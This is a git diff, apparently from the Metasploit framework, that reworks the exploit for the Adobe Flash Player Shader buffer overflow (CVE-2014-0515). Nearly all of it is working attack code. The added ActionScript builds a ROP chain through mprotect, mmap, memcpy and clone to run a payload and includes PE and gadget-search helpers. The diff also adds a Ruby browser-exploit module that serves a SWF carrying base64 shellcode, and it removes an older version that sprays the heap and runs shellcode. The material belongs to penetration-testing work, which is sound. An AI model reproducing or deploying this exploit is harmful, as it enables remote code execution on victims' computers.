+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as
deleted file mode 100755
index ab64eb90cd..0000000000
--- a/external/source/exploits/CVE-2014-0515/Graph.as
+++ /dev/null
@@ -1,411 +0,0 @@
-//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf
-package {
-	import flash.display.Sprite;
-	import flash.utils.ByteArray;
-	import flash.display.Shader;
-	import flash.system.Capabilities;
-	import flash.net.FileReference;
-	import flash.utils.Endian;
-	import __AS3__.vec.Vector;
-	import __AS3__.vec.*;
-	import flash.display.LoaderInfo;
-	
-	public class Graph extends Sprite {
-		
-		static var counter:uint = 0;
-		
-		protected var Shad:Class;
-		var shellcode_byte_array:ByteArray;
-		var aaab:ByteArray;
-		var shellcodeObj:Array;
-		
-		public function Graph(){
-			var tweaked_vector:* = undefined;
-			var tweaked_vector_address:* = undefined;
-			var shader:Shader;
-			var flash_memory_protect:Array;
-			var code_vectors:Array;
-			var address_code_vector:uint;
-			var address_shellcode_byte_array:uint;
-			this.Shad = Graph_Shad;
-			super();
-			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");
-			var i:* = 0;
-			var j:* = 0;
-			
-			// Just one try
-			counter++;
-			if (counter > 1)
-			{
-				return;
-			};
-			
-			// Memory massage
-			var array_length:uint = 0x10000;
-			var vector_size:uint = 34;
-			var array:Array = new Array();
-			i = 0;
-			while (i < array_length)
-			{
-				array[i] = new Vector.<int>(1);
-				i++;
-			};
-			i = 0;
-			while (i < array_length)
-			{
-				array[i] = new Vector.<int>(vector_size);
-				i++;
-			};
-			i = 0;
-			while (i < array_length)
-			{
-				array[i].length = 0;
-				i++;
-			};
-			i = 0x0200;
-			while (i < array_length)
-			{
-				array[(i - (2 * (j % 2)))].length = 0x0100;
-				i = (i + 28);
-				j++;
-			};
-			
-			// Overflow and Search for corrupted vector
-			var corrupted_vector_idx:uint;
-			var shadba:ByteArray = (new this.Shad() as ByteArray);
-			shadba.position = 232;
-			if (Capabilities.os.indexOf("Windows 8") >= 0)
-			{
-				shadba.writeUnsignedInt(2472);
-			};
-			shadba.position = 0;
-			while (1)
-			{
-				shader = new Shader();
-				try
-				{
-					shader.byteCode = (new this.Shad() as ByteArray);
-				} catch(e)
-				{
-				};
-				i = 0;
-				while (i < array_length)
-				{
-					if (array[i].length > 0x0100)
-					{
-						corrupted_vector_idx = i;
-						break;
-					};
-					i++;
-				};
-				if (i != array_length)
-				{
-					if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break;
-				};
-				array.push(new Vector.<int>(vector_size));
-			};
-			
-			// Tweak the vector following the corrupted one
-			array[corrupted_vector_idx][vector_size] = 0x40000001;
-			tweaked_vector = array[(corrupted_vector_idx + 1)];
-			
-			// repair the corrupted vector by restoring its
-			// vector object pointer and length
-			var vector_obj_addr:* = tweaked_vector[0x3fffffff];
-			tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr;
-			tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size;
-			i = 0;
-			var val:uint;
-			while (true)
-			{
-				val = tweaked_vector[(0x40000000 - i)];
-				if (val == 0x90001B) break;
-				i++;
-			};
-			tweaked_vector_address = 0;
-			if (tweaked_vector[((0x40000000 - i) - 4)] > 0)
-			{
-				tweaked_vector[4] = 0x41414141;
-				tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8);				
-			};
-			
-			// More memory massage, fill an array of FileReference objects
-			var file_reference_array:Array = new Array();
-			i = 0;
-			while (i < 64)
-			{
-				file_reference_array[i] = new FileReference();
-				i++;
-			};
-			
-			var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address);
-			var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20));
-			var do_it:Boolean = true;
-			var memory_protect_ptr:uint;
-			var aaaq:uint;
-			if (do_it)
-			{
-				flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address);
-				memory_protect_ptr = flash_memory_protect[0];
-				aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment
-				code_vectors = this.createCodeVectors(0x45454545, 0x90909090);
-				address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545);
-				this.fillCodeVectors(code_vectors);
-				tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call
-				tweaked_vector[4] = aaaq; 				
-				tweaked_vector[0] = 0x1000; // Length
-				tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address
-				
-				// 10255e21 ff5014          call    dword ptr [eax+14h]  ds:0023:41414155=????????
-				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8));
-				
-				// 1) Set memory as executable
-				i = 0;
-				while (i < 64)
-				{
-					file_reference_array[i].cancel();
-					i++;
-				};
-				
-				// 2) Execute shellcode 
-				tweaked_vector[7] = address_code_vector;
-				i = 0;
-				while (i < 64)
-				{
-					file_reference_array[i].cancel();
-					i++;
-				};
-				
-				// Restore FileReference cancel function pointer
-				// Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads
-				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address);
-			};
-		}
-		
-		// returns the integer at memory address
-		// vector: vector with tweaked length
-		// vector_address: vector's memory address
-		// address: memory address to read
-		function read_memory(vector:Vector.<int>, vector_address:uint, address:uint):uint{
-			if (address >= vector_address)
-			{
-				return (vector[((address - vector_address) / 4)]);
-			};
-			return (vector[(0x40000000 - ((vector_address - address) / 4))]);
-		}
-		
-		function write_memory(vector:Vector.<int>, vector_address:uint, address:uint, value:uint){
-			if (address >= vector_address)
-			{
-				vector[((address - vector_address) / 4)] = value;
-			} else
-			{
-				vector[(0x40000000 - ((vector_address - address) / 4))] = value;
-			};
-		}
-		
-		function findFlashMemoryProtect(vector:*, vector_address:*):Array{
-			var content:uint;
-			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
-			var index:uint;
-			var memory_protect_ptr:uint;
-			var _local_6:uint;
-			if (allocation >= vector_address)
-			{
-				index = ((allocation - vector_address) / 4);
-			} else
-			{
-				index = (0x40000000 - ((vector_address - allocation) / 4));
-			};
-			
-			//push    1 ; 6a 01
-			//push    dword ptr [eax-8] ; ff 70 f8
-			//push    dword ptr [eax-4] ; ff 70 fc
-			//call    sub_1059DD00 // Will do VirtualProtect
-			var offset:uint;
-			while (1)
-			{
-				index--;
-				content = vector[index];
-				if (content == 0xfff870ff)
-				{
-					offset = 2;
-					break;
-				};
-				if (content == 0xf870ff01)
-				{
-					offset = 1;
-					break;
-				};
-				if (content == 0x70ff016a)
-				{
-					content = vector[(index + 1)];
-					if (content == 0xfc70fff8)
-					{
-						offset = 0;
-						break;
-					};
-				} else
-				{
-					if (content == 0x70fff870)
-					{
-						offset = 3;
-						break;
-					};
-				};
-			};
-			
-			memory_protect_ptr = ((vector_address + (4 * index)) - offset);
-			index--;
-			var content_before:uint = vector[index];
-			
-			if (content_before == 0x16a0424)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			if (content_before == 0x6a042444)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			if (content_before == 0x424448b)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			if (content_before == 0xff016a04)
-			{
-				return ([memory_protect_ptr, _local_6]);
-			};
-			_local_6 = (memory_protect_ptr - 6);
-			
-			while (1)
-			{
-				index--;
-				content = vector[index];
-				if (content == 0x850ff50)
-				{
-					if (uint(vector[(index + 1)]) == 0x5e0cc483)
-					{
-						offset = 0;
-						break;
-					};
-				};
-				content = (content & 0xFFFFFF00);
-				if (content == 0x50FF5000)
-				{
-					if (uint(vector[(index + 1)]) == 0xcc48308)
-					{
-						offset = 1;
-						break;
-					};
-				};
-				content = (content & 0xFFFF0000);
-				if (content == 0xFF500000)
-				{
-					if (uint(vector[(index + 1)]) == 0xc4830850)
-					{
-						if (uint(vector[(index + 2)]) == 0xc35d5e0c)
-						{
-							offset = 2;
-							break;
-						};
-					};
-				};
-				content = (content & 0xFF000000);
-				if (content == 0x50000000)
-				{
-					if (uint(vector[(index + 1)]) == 0x830850ff)
-					{
-						if (uint(vector[(index + 2)]) == 0x5d5e0cc4)
-						{
-							offset = 3;
-							break;
-						};
-					};
-				};
-			};
-			memory_protect_ptr = ((vector_address + (4 * index)) + offset);
-			return ([memory_protect_ptr, _local_6]);
-		}
-		
-		// vector: vector with tweaked length
-		// address: memory address of vector data
-		function find_file_ref_vtable(vector:*, address:*):uint{
-			var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c));
-			
-			// Find an allocation of size 0x2a0
-			var allocation_size:uint;
-			while (true)
-			{
-				allocation_size = this.read_memory(vector, address, (allocation + 8));
-				if (allocation_size == 0x2a0) break;
-				if (allocation_size < 0x2a0)
-				{
-					allocation = (allocation + 0x24); // next allocation
-				} else
-				{
-					allocation = (allocation - 0x24); // prior allocation
-				};
-			};
-			var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc));
-			while (true)
-			{
-				if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break;
-				if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break;
-				allocation_contents = this.read_memory(vector, address, (allocation_contents + 8));
-			};
-			return (allocation_contents);
-		}
-		
-		// Returns pointer to the nops in one of the allocated code vectors
-		function findCodeVector(vector:*, vector_address:*, mark:*):uint{
-			var allocation_size:uint;
-			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
-			while (true)
-			{
-				allocation_size = this.read_memory(vector, vector_address, (allocation + 8));
-				if (allocation_size == 0x7f0) break; // Code Vector found
-				allocation = (allocation + 0x24); // next allocation
-			};
-			
-			// allocation contents should be the vector code, search for the mark 0x45454545 
-			var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc));
-			while (true)
-			{
-				if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break;
-				allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation
-			};
-			return ((allocation_contents + 0x2c));
-		}
-				
-		// create 8 vectors of size 0x7f0 inside an array to place shellcode 
-		function createCodeVectors(mark:uint, nops:uint){
-			var code_vectors_array:Array = new Array();
-			var i:* = 0;
-			while (i < 8)
-			{
-				code_vectors_array[i] = new Vector.<uint>(((0x7f0 / 4) - 8)); // new Vector.<uint>(0x1f4)
-				code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4
-				code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4
-				i++;
-			};
-			return (code_vectors_array);
-		}
-		
-		
-		// Fill with the code vectors with the shellcode
-		function fillCodeVectors(array_code_vectors:Array) {
-			var i:uint = 0;
-			var sh:uint=1;
-			
-			while(i < array_code_vectors.length)
-			{	
-				for(var u:String in shellcodeObj)
-				{
-					array_code_vectors[i][sh++] = Number(shellcodeObj[u]); 
-				}
-				i++;
-				sh = 1;
-			}
-		}		
-	}
-}//package 
diff --git a/external/source/exploits/CVE-2014-0515/GraphShadLinux.as b/external/source/exploits/CVE-2014-0515/GraphShadLinux.as
new file mode 100755
index 0000000000..2593201484
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/GraphShadLinux.as
@@ -0,0 +1,10 @@
+package
+{
+	import mx.core.ByteArrayAsset;
+	
+	[Embed(source="binary_data_linux", mimeType="application/octet-stream")]
+	public class GraphShadLinux extends ByteArrayAsset
+	{
+
+	}
+}
diff --git a/external/source/exploits/CVE-2014-0515/GraphShadWindows.as b/external/source/exploits/CVE-2014-0515/GraphShadWindows.as
new file mode 100755
index 0000000000..e4f5f20453
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/GraphShadWindows.as
@@ -0,0 +1,10 @@
+package
+{
+	import mx.core.ByteArrayAsset;
+	
+	[Embed(source="binary_data_windows", mimeType="application/octet-stream")]
+	public class GraphShadWindows extends ByteArrayAsset
+	{
+
+	}
+}
diff --git a/external/source/exploits/CVE-2014-0515/Graph_Shad.as b/external/source/exploits/CVE-2014-0515/Graph_Shad.as
deleted file mode 100755
index c0e84dff5d..0000000000
--- a/external/source/exploits/CVE-2014-0515/Graph_Shad.as
+++ /dev/null
@@ -1,10 +0,0 @@
-package
-{
-	import mx.core.ByteArrayAsset;
-	
-	[Embed(source="binary_data", mimeType="application/octet-stream")]
-	public class Graph_Shad extends ByteArrayAsset
-	{
-
-	}
-}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2014-0515/Logger.as b/external/source/exploits/CVE-2014-0515/Logger.as
new file mode 100755
index 0000000000..61ec768c25
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 1
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/PE.as b/external/source/exploits/CVE-2014-0515/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/binary_data_linux b/external/source/exploits/CVE-2014-0515/binary_data_linux
new file mode 100755
index 0000000000000000000000000000000000000000..27a7ca7f9dff7ee5685f065e1bd6cb51fecbde39
GIT binary patch
literal 2425
zcmeH}L5tH+5Xb+?OHi<AysiY|;z?Mr?ds8HTk$05$(v|wUm@5{mn2<wJ>?{R0*}(I
zdKb^4yRwKMN7)ac|9N@ET2Z{nUivQ6nfK<+%rC>6zHtD&K8IeuUzEvcls?tdMwV>r
zVkhbAMRW9cKf0&OJdN(?;z^q64AaK0&IaQgn4aC$d6AAYIJ6FQ(a+PJQuKw3qm5xY
zDs_$n#|0V>?@r3zc$^QYGYhw1Y|NbPG`pXSCK{azq9%K_+Is=C6%HMmUA&E51aau%
zNFl&Ag>TdmIyh0dgxQ&a9ww7fS-WmcS>*ZWbnJF}T(`KkxVl{bqHoe&!mi|s!)f%v
z4fda`m0WQ+jXs$D@}iq}`W3t)@8iJr99$R_B|`B1MTM4&>NX;g@ux39OQGr%<$KEb
z!^`U(%IIb-1F?r5JjJ3yA1A<fDC$1-ML&B!vi`=8_eVBPAaUq_Bq_L*91q}VX!_LG
zU2Mwz48r}dP?WO2#(fzbCXU2cNW|_?ntaUuBjfMY`}7NBe}2CiJ(5S~*>K2s0ZWIH
zLzKe9#i4MBKG!?~ldtf2@NPqRe5~t?I<*YM{#PE>&z_I0zwvANs7xFmvBV*drsZKc
z2p^yIt@}7$<{_Nc)DjP#SHi<c!-xLlsc>w0G%YW~QFzOFax{Eg!#ltgh0DUZw)6Y^
zv|kkaRrUj?I!AX^5!)X}eBBT2Ht&fge}2b!&RKpgeqX8kw|YEVkCAmf^M3FoKid!g
KEC1!cC_ezeoEjMb

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2014-0515/binary_data b/external/source/exploits/CVE-2014-0515/binary_data_windows
similarity index 100%
rename from external/source/exploits/CVE-2014-0515/binary_data
rename to external/source/exploits/CVE-2014-0515/binary_data_windows
diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
new file mode 100644
index 0000000000..7265fba575
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Adobe Flash Player Shader Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
+        vulnerability occurs in the flash.Display.Shader class, when setting specially
+        crafted data as its bytecode, as exploited in the wild in April 2014. This module
+        has been tested successfully on:
+        * Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182.
+        * Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182
+        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182.
+        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.350
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discovery and exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-0515'],
+          ['BID', '67092'],
+          ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],
+          ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.7.700.275')
+              return true if ver =~ /^12\./
+              return true if ver =~ /^13\./ && Gem::Version.new(ver) <= Gem::Version.new('13.0.0.182')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.350')
+            end
+
+            false
+          end
+        },
+      'Targets' =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 28 2014',
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
index 4e54893877..48b2268ad1 100644
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -9,10 +9,13 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015, 8, 11), 'exploit/multi/browser/adobe_flash_uncompress_zlib_uaf')
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Adobe Flash Player Shader Buffer Overflow",
+      'Name'           => 'Adobe Flash Player Shader Buffer Overflow',
       'Description'    => %q{
         This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
         vulnerability occurs in the flash.Display.Shader class, when setting specially
@@ -36,16 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'Space' => 2000,
-          'DisableNops' => true,
-          'PrependEncoder' => stack_adjust
-        },
-      'DefaultOptions'  =>
-        {
-          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
-          #'InitialAutoRunScript' => 'migrate -f',
-          'Retries'              => false,
-          'EXITFUNC'             => "thread"
+          'DisableNops' => true
         },
       'Platform'       => 'win',
       'BrowserRequirements' =>
@@ -60,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Automatic', {} ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Apr 28 2014",
+      'DisclosureDate' => 'Apr 28 2014',
       'DefaultTarget'  => 0))
   end
 
@@ -69,48 +63,34 @@ class Metasploit3 < Msf::Exploit::Remote
     super
   end
 
-  def stack_adjust
-    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
-    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
-    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
-    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
-
-    adjust
-  end
-
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
     if request.uri =~ /\.swf$/
-      print_status("Sending SWF...")
+      print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
       return
     end
 
-    print_status("Sending HTML...")
-    tag = retrieve_tag(cli, request)
-    profile = get_profile(tag)
-    profile[:tried] = false unless profile.nil? # to allow request the swf
+    print_status('Sending HTML...')
     send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
   end
 
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    flash_payload = ""
-    get_payload(cli,target_info).unpack("V*").each do |i|
-      flash_payload << "0x#{i.to_s(16)},"
-    end
-    flash_payload.gsub!(/,$/, "")
-
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
